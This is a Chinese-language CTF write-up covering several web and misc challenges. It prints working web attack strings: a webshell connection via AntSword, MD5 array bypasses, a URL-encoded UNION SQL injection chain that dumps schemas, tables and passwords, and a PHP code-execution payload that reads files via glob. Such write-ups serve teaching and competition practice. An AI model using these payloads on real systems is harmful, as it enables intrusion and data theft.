希望看完之后可以对你熟悉ctf比赛以及提高技术水平有所帮助!
9.where_is_the_flag

进⼊靶机
标准的⼀句话⽊⻢ 打开蚁剑 添加数据

由此可以轻松拿到flag1
返回根⽬录⼜能找到flag2

最后flag3需要打开虚拟终端
echo $FLAG3
得到完整flag
10.绕进你的心里

分析命令⾏ get输⼊两个MD5值相等但不同的两个值 可以⽤数组的⽅式绕过 ?hongmeng[0]=1&shennong[0]=2
接下来是post输⼊的pan_gu stripos函数要求字符串中要包含2023ISCTF preg_match正则匹配函数 /i 表示不区分⼤⼩写,/s 表示字⺟,不能让它匹配到ISCTF,垃圾数据逃 逸,⼤量垃圾数据使检测的过程崩溃
我在160k字典后⾯加上了2023ISCTF
得到flag
11.easy_website
sql注⼊,'显示数据库查询失败,说明是'闭合,⽽且有过滤
order变成了der,空格也没了 ⽤url编码%6f代替o绕过or过滤,+代替空格 1'+%6frder+by+4+#
⼆分法继续往下爆字段
最后发现字段为1 经过测试发现union select也被过滤 全部转换为url编码 爆schema 1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+schema_name+from+inf%6frmation_sche ma.schemata+#
要让他显示多⾏内容要⽤到groupconcat函数 1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(schema_name)+from+inf%6 frmation_schema.schemata+#
找到users的库⾥,继续爆table where指定在users的库中 1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(table_name)+from+inf%6frm ation_schema.tables+where+table_schema='users'+#
爆column 1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(column_name)+from+inf%6f rmation_schema.columns+where+table_name='user'+#
在password列⾥找,明指 users数据库下的users表 and也⽤url编码绕过过滤 1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(column_name)+from+inf%6f rmation_schema.columns+where+table_schema='users' +a%6ed+table_name='users'+#
最后看字段内容 1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+passw%6frd+from+users.users+%23
还是⽤groupconcat 1'+%75%6e%69%6f%6e+%73%65%6c%65%63%74+group_concat(passw%6frd)+from+users.us ers+#
得到flag
12.wafr

找到没被过滤的并且能够读取⽂件的函数 var_dump() 显示参数信息/输出内容 file_get_contents() 将⽂件读⼊⼀个字符串 var_dump(file_get_contents("⽂件名")); file_get_contents将⽂件的内容以字符串的形式返回, var_dump再对字符串进⾏输出,但是file_get_contents不⽀持通配符,那么需要⼀个函数⽀持通配符并 且能够返回匹配的flag⽂件路径 glob() 返回⼀个包含匹配的指定⽂件名或⽬录的数组,可以使⽤通配符 glob('/f*')[0] -> array[0]=flag.txt *通配符匹配f开头的⽂件名
post:code=var_dump(file_fet_contents(glob('/f*')[0])) 得到flag
13.签到题
下载后是两张图⽚
随便拼接⼀下,扫描到蓝鲨信息公众号
得到flag
14.你说爱我?尊嘟假嘟
下载后改后缀为zip 解压得到⼀个⽂件
这是⼀个三元密码查到是Ook密码,⽤Ook解码需要转换格式,其中Ook.最多,把⽂档中的你说爱我全部替换为Ook. 经过测试尊嘟替换为Ook!假嘟替换为Ook?
https://www.splitbrain.org/services/ook
ild3l4pXejwPcCwJsPAOq7sJczdRdTsJcCEUsP1Z ⽤base64解码,这⾥是变种base64使⽤0-9a-zA-Z+/ =为填充
得到flag
有任何问题都可以随时关注私信!
夜雨聆风